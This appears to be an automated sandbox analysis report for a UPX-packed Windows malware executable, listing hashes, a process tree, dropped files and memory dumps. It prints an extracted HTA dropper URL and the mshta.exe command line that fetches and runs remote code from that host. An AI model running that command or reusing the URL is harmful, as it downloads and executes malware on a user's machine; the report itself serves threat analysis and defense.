Overview

overview

10

Static

static

7

7a4c9b39d6...13.exe

windows7-x64

7a4c9b39d6...13.exe

windows10-2004-x64

Analysis

  • max time kernel
    0s
  • max time network
    9s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2024 12:49

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    7a4c9b39d68921eb09cbbdc86bfce813.exe

  • Size

    510KB

  • MD5

    7a4c9b39d68921eb09cbbdc86bfce813

  • SHA1

    c08650fac5f61eca5d2bad31fa5c43d8dadd2e06

  • SHA256

    6807e7aad82af62fe890d61c05410ff92da6a8060fd3fcaf75cba02c486190d8

  • SHA512

    a8e1bdbc0d9dbe2481a0785b4bd5399408ed3bd780e41ab92c332a51c5ed2210d77fab624df11c06003ceac176765d3ffd7c6a8ae3553dc216ed22792d934391

  • SSDEEP

    12288:84EE+tbepH42vOZVFtgxP4R2fS/jBcxvmbQXmPSUXeGuJkaL1+bOaYlc:x4ipHjOZzCxFzRmb+mPfXykf4

Score
10/10
upx

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://cherezzaborpereprig.com/inst.php?id=skytraf01

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious use of SetWindowsHookEx 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a4c9b39d68921eb09cbbdc86bfce813.exe
    "C:\Users\Admin\AppData\Local\Temp\7a4c9b39d68921eb09cbbdc86bfce813.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2548
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" http://cherezzaborpereprig.com/inst.php?id=skytraf01
      2⤵
        PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Roaming\dkfjasdfshd.bat" "
        2⤵
          PID:2560
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x0
        1⤵
          PID:2604
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x1
          1⤵
            PID:2972

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\dkfjasdfshd.bat
            Filesize

            238B

            MD5

            d94e6ea43a7b83700eff4e726a1c54d9

            SHA1

            1bc4508b5690fd6432c6fe876db1cde71b3e41ac

            SHA256

            0f999d52f639f2929346de15a353124c8439deae376a2961c4b20513f97661a2

            SHA512

            25f2f3ccd34496ffc62662829fff428e6695e7873bb7a4c1ae919974ec2602cc5762a3b844b70514ec347ba4f78b6c56da6271e0f7f77fa83bf6b9d0d8956963

            Download Submit
          • memory/2548-0-0x0000000000400000-0x00000000006AE000-memory.dmp
            Filesize

            2.7MB

            Download
          • memory/2548-1-0x0000000000230000-0x0000000000231000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2548-13-0x0000000000400000-0x00000000006AE000-memory.dmp
            Filesize

            2.7MB

            Download
          • memory/2604-12-0x0000000002E10000-0x0000000002E11000-memory.dmp
            Filesize

            4KB

            Download
          • memory/2972-14-0x0000000002AB0000-0x0000000002AB1000-memory.dmp
            Filesize

            4KB

            Download